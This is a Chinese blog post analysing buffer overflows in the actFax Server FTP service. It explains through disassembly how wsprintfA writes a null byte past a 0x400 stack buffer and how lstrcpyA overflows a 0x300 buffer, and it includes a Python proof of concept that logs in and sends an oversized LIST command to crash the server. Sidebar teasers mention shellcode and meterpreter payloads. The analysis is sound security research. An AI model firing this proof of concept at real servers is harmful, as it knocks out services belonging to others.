wsprintf格式化拷贝null字节问题

最新推荐文章于 2021-09-19 18:18:05 发布
最新推荐文章于 2021-09-19 18:18:05 发布
阅读量1.1k 收藏
点赞数
分类专栏: 漏洞分析 文章标签: null buffer byte string server stream
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/instruder/article/details/6582201
版权

今天在分析exploit-db上面的actFax Server FTP Remote BOF (post auth) Bigger Buffer时,http://www.exploit-db.com/exploits/17373/


顺带看了下有没别的可以利用的地方,这个actfax采用了大量的不安全的拷贝、格式化函数,很容易出现问题


在ftp处理网络中的数据时,最大的数据为0x400大小,在使用wsprintfA格式化这个数据时,只分配了大小刚好的0x400的堆栈,这样会导致问题


wsprintf在格式化时会拷贝字符串最后一个null字节,这样0x400的数据,实际上格式化后拷贝的为0x401数据,最后一个为0x00,会导致返回地址


最低位被填0x00,导致软件crash掉。

bug汇编形态代码:

.text:00458350 sub_458350      proc near               ; CODE XREF: MainListenThread+7Dp
.text:00458350                                         ; MainListenThread+E4p ...
.text:00458350
.text:00458350 Buffer          = byte ptr -400h
.text:00458350 arg_0           = dword ptr  4
.text:00458350 arg_4           = dword ptr  8
.text:00458350
.text:00458350                 mov     eax, [esp+arg_4]
.text:00458354                 sub     esp, 400h
.text:0045835A                 lea     ecx, [esp+400h+Buffer]
.text:0045835E                 push    eax
.text:0045835F                 push    offset aS_11    ; "%s\r\n"
.text:00458364                 push    ecx             ; LPSTR
.text:00458365                 call    ds:wsprintfA
.text:0045836B                 mov     eax, [esp+40Ch+arg_0]
.text:00458372                 lea     edx, [esp+40Ch+Buffer]
.text:00458376                 push    0FFFFFFFFh      ; nNumberOfBytesToWrite
.text:00458378                 push    edx             ; lpBuffer
.text:00458379                 push    eax             ; int
.text:0045837A                 call    sub_4B7A70      ; bug 如果刚好400字节 wsprintf会多拷贝一个00字节导致返回地址被改变
.text:0045837F                 add     esp, 418h
.text:00458385                 retn
.text:00458385 sub_458350      endp


poc:

#!/usr/bin/python

import socket
import sys

typebuffer = "\x41"*1024
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.113',21))

print (s.recv(1024))
s.send('USER ' + 'Administrator\r\n')
print (s.recv(1024))
s.send('PASS \r\n')
print (s.recv(1024))
s.send('LIST'+ typebuffer + '\r\n')

s.close



另外这个actFax Server FTP Remote BOF (post auth) Bigger Buffer的产生是因为分配了大小0x300的堆栈,然后直接使用lstrcpy函数进行拷贝,最大的


数据大小为0x400,导致堆栈溢出。

.text:00458410 ; int __cdecl sub_458410(LPCSTR NetWorkData)
.text:00458410 sub_458410      proc near               ; CODE XREF: MainListenThread+817p
.text:00458410
.text:00458410 String1         = byte ptr -300h
.text:00458410 String2         = byte ptr -200h
.text:00458410 var_100         = byte ptr -100h
.text:00458410 NetWorkData     = dword ptr  4
.text:00458410
.text:00458410                 mov     eax, [esp+NetWorkData]
.text:00458414                 sub     esp, 300h
.text:0045841A                 lea     ecx, [esp+300h+String1]
.text:0045841E                 push    esi
.text:0045841F                 mov     esi, ds:lstrcpyA
.text:00458425                 push    eax             ; lpString2
.text:00458426                 push    ecx             ; lpString1
.text:00458427                 call    esi ; lstrcpyA//堆栈溢出


instruder
关注
专栏目录
针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字的shellcode回连msf
MickeyMouse1928的博客
05-04 4819
环境: Kali攻击机1 IP:192.168.114.140 Win7攻击机2 IP(安装gcc和python2.7):192.168.114.130 Windows server 2003目标主机(开启webdev服务):192.168.114.132   在攻击机1中的操作: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpre
利用sscanf()函数得到屏幕的像素大小
飞鸿惊雪
05-23 3263
在移植SDL,和把仙剑移植到openwrt上时,为了使游戏进入全屏模式,需要查询下液晶屏的像素大小。fbset指令可以查询得到。 fbset
wsprintf()函数与输出格式化
liziyun537的专栏
10-22 1038
<br />在C语言中格式化字符串可以使用printf,但是在WINDOWS编程设计中却行不通了,但是却有变通的方法,那就是用 wsprintf这个函数。它的格式如下:<br />1intwsprintf (  LPTSTRlpOut,   // 指向需要输出的字符串的指针2                LPCTSTRlpFmt,  //指向格式控制字符串的指针3                ……              // 其他可选参数4            );<br />wsprintf(缓
wsprintf 格式化字符串
objectively的专栏
08-14 773
sprintf 对应的字符串是字符类型为char,即一个字符占用1个字节的内存空间。 wsprintf 根据 UNICODE 宏是否定义,自动使用char或wchar_t。 TCHAR str[100]; wsprintf(str,_T("我的生日:%d"),1984);
alpha2 shellcode加密(转字符串)VC2008工程
11-23
国外大牛开发的把shellcode全部转为字符串并且能正常运行的加密码算法,非常牛,因为网络上很难找到,本来通过收集网络上的alpha2算法片段拼凑出来的完整版,听说有alpha3了但感觉这个够用了,特来分享我的百度博客: http://hi.baidu.com/icelphi
漏洞汇编形态一:NULL结尾拷贝
爱杀之爪的矩阵
02-14 681
<br />........<br />01D0CE77    0FB701          MOVZX EAX,WORD PTR DS:[ECX]<br />01D0CE7A    66:8902         MOV WORD PTR DS:[EDX],AX<br />01D0CE7D    83C1 02         ADD ECX,2<br />01D0CE80    83C2 02         ADD EDX,2;UNICODE<br />01D0CE83    66:3BC3    
CString 操作指南
wangjieest的专栏
02-28 3666
CString 操作指南 原著:Joseph M. Newcomer 翻译:littleloach 原文出处:codeproject:CString Management 通过阅读本文你可以学习如何有效地使用 CString。   CString 是一种很有用的数据类型。它们很大程度上简化了MFC中的许多操作,使得MFC在做字符串操作的时候方便了很多。不管怎样,使
CString 用法总结(字符串转换)
lbqBraveheart的专栏
05-16 1万+
CString 操作指南原著:Joseph M. Newcomer翻译:littleloach原文出处:codeproject:CString Management通过阅读本文你可以学习如何有效地使用 CString。  CString 是一种很有用的数据类型。它们很大程度上简化了MFC中的许多操作,使得MFC在做字符串操作的时候方便了很多。不管怎样,使用CString有很多特殊的技巧,特别是
evc vc字符串转换处理一:(绝对精华,收集所有的例子)
scollins的专栏
04-21 1030
1.头文件中要定义宏;         #define   UNICODE         #define   _UNICODE     ////////////////////char   buf[128];     memset(buf,0,128);     strcpy(buf,"你好");     WCHAR   pCName[128];     memset(pCName,0,12
vc++基本图形生成的基本知识和概念
xuerene2的专栏
11-24 1801
RECT 类型定义 Type RECTLeft As LongTop As LongRight As LongBottom As LongEnd Type 说明 这是windows广泛采用的一种数据结构,通常作为参数传递给许多api函数。RECT结构表示一个矩形区域,left和top字段描叙了矩形第一个角(通常是左上角),right和bottom字段描叙了矩形的第二个角(通常是右下角)。这两个
格式化字符 wsprintf
ssihc0的专栏
05-15 2206
invoke locate,2,2   ;设定输出文本的坐标 mov eax,1235   invoke wsprintf,offset lpszSize,CTXT("%d"),eax ;将EAX 按照Signed decimal integer格式化,然后放到 ;lpszSize中   invoke StdOut, offset lpszSize ;暂停显示,回车键关闭 invoke Std
第一次求职失败了,心碎
爱杀之爪的矩阵
10-14 871
<br />复试遭人鄙视了,看起来从进入房间就没打算要我。。<br /> <br />花了一千多来回<br /> <br />不过也交到几个朋友<br /> <br /> <br /> <br />-----------------------------打击越大,我就要变的更强大!!
C语言经典面试题之深入解析字符串拷贝sprintf、strcpy和memcpy使用与区别
╰つ栺尖篴夢ゞ
09-19 6557
sprintf 指的是字符串格式化命令,是把格式化的数据写入某个字符串中,即发送格式化输出到 string 所指向的字符串,直到出现字符串结束符 '\0' 为止。
一个最简单的CARCKME代码
爱杀之爪的矩阵
08-30 571
#include#includevoid registerNC(char *p,int q){ unsigned int i; for(i=0;i  *(p+i)=*(p+i)^(q+i);}void main(){ char name[10],code[10]; printf("请输入注册名:"); scanf("%s",name); printf("请输入注册码:"); scanf("%s",
怎么解决name 'Tkinter' is not defined 问题
热门推荐
爱杀之爪的矩阵
11-26 2万+
解决name 'Tkinter' is not defined   
纯字符数字的shllcode及Alpha2.c使用
爱杀之爪的矩阵
12-02 4935
<br />#include <stdio.h> #include <windows.h> //纯字符数字的shellcode,显示个calc char aphal1[]={"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkVvqKRJ31PXrsOKtMFEk6cL9oKcFQIPPPmkFrHKNaQlYoXSjHIu9oyokOsSu1RLasfNQuPxPegps0A"}; int main(int argc, char *
wsprintf
最新发布
05-31
wsprintf 是一个Windows API函数,用于格式化一个字符串并将其存储到一个缓冲区中。该函数的原型如下: ```c++ int WINAPI wsprintf( LPWSTR lpOut, LPCWSTR lpFmt, ... ); ``` 其中,lpOut 是一个指向存储格式...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值